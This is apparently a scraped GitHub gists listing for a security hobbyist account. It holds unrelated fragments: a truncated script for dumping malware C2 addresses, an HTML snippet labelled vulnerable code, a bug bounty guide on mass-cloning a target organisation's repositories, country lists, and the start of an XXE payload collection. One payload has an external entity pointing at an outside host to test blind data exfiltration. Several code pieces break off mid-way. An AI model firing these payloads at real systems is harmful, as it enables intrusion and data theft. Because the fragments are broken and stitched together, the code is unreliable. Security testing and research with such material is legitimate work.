HUNTER SaFiSec

import socket
import struct
def dump_c2_list(c2_list):
    for i in range(0xFFFFFF):
        ip = Dword(c2_list + (i*8))
        if ip == 0:
            break
<!DOCTYPE html>
<!-- Vulnerable Code-->
<html>
<body>
<script>
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
</script>
@SaFiSec
SaFiSec / github_bugbountyhunting.md
Created July 17, 2019 20:00 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. In this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@SaFiSec
SaFiSec / raree.md
Created May 31, 2020 10:28 — forked from nonohry/raree.md
Awesome Collection Of Rare Hacking E-Books And PDF || 2018 Latest
@SaFiSec
SaFiSec / countries
Created June 2, 2020 16:29 — forked from kalinchernev/countries
Plain text list of countries
Afghanistan
Albania
Algeria
Andorra
Angola
Antigua & Deps
Argentina
Armenia
Australia
Austria
@SaFiSec
SaFiSec / README.markdown
Created June 2, 2020 16:31 — forked from marijn/README.markdown
List of countries in YAML, CSV and TXT format
@SaFiSec
SaFiSec / countries-hash.js
Created June 2, 2020 16:33 — forked from amabes/countries-hash.js
Countries Object (ES6)
export const countries = {
  AF: 'Afghanistan',
  AL: 'Albania',
  DZ: 'Algeria',
  AS: 'American Samoa',
  AD: 'Andorra',
  AO: 'Angola',
  AI: 'Anguilla',
  AQ: 'Antarctica',
  AG: 'Antigua And Barbuda',
@SaFiSec
SaFiSec / content_discovery_all.txt
Created September 10, 2020 22:45 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated.
`
~/
~
ים
___
__
_
---

Getting Started

https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 Chinese
https://wizardforcel.gitbooks.io/asani/content/ Easy to get Android security Chinese version
https://wizardforcel.gitbooks.io/lpad/content/ Android penetration test study manual Chinese version
https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web Penetration Test Cheats Chinese Version
https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit Development Primer
https://www.gitbook.com/book/t0data/burpsuite/details burpsuite actual guide
http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Penetration Testing Node.js Application
https://github.com/qazbnm456/awesome-web-security Web Security Information and Resources List

@SaFiSec
SaFiSec / XXE_payloads
Created October 27, 2020 19:11 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>